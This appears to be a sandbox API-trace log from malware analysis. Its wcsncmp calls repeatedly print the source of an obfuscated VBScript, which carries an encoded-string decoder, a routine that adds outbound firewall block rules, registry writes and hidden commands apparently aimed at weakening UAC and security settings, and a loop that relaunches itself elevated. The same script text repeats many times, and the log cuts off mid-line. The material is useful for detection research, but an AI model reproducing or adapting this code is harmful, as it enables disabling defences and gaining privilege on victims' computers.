If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0226.293] wcsncmp (_String1="\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.293] wcsncmp (_String1="sr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.293] wcsncmp (_String1="r = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.293] wcsncmp (_String1=" = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 